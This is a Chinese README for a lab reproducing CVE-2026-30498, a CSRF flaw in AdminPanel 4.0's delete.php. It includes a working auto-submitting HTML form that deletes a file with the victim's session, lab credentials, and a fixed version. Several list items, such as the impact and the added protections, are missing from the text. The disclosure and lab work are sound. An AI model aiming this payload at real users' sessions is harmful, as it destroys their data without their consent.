CVE 编号: CVE-2026-30498 (由 MITRE 保留)
发现者: Mehdi Ben Hamou
AdminPanel 4.0 的 delete.php 端点存在**跨站请求伪造(CSRF)**漏洞。
该漏洞允许攻击者在未经用户同意的情况下,以已认证用户的身份触发敏感操作(文件删除)。
该漏洞是由于缺少 CSRF 防护机制所致:
易受攻击的端点直接基于用户会话处理请求,而未验证请求来源。
成功利用该漏洞将导致:
verifyPanel.php攻击者托管一个恶意网页,发送伪造请求:
http://localhost:8080/delete.php?file=verifyPanel.php
当受害者(已认证用户)访问该页面时,浏览器会自动附带会话 Cookie,请求随即被执行。
<form id="csrfForm" action="http://localhost:8080/delete.php" method="GET">
<input type="hidden" name="file" value="verifyPanel.php">
</form>
<script>
document.getElementById("csrfForm").submit();
</script>
该请求会自动携带受害者的会话 Cookie 发送。
php -S localhost:8080
http://localhost:8080
admin / admin123
http://localhost:8081/evil.html
/panel/dashboard.php
本仓库包含一个受控的实验环境,可安全地复现该漏洞。
重要提示: 本实验为模拟环境,并不代表原始 AdminPanel 代码库的确切内容。
如需重置环境:
/reset.php
已在以下文件中实现安全版本:
delete_fixed.php
新增的防护措施:
victim/
├── index.php
├── delete.php
├── delete_fixed.php
├── reset.php
└── panel/
└── dashboard.php
attacker/
└── evil.html
本项目仅用于教育和研究目的。
未经适当授权,请勿在系统上使用此漏洞。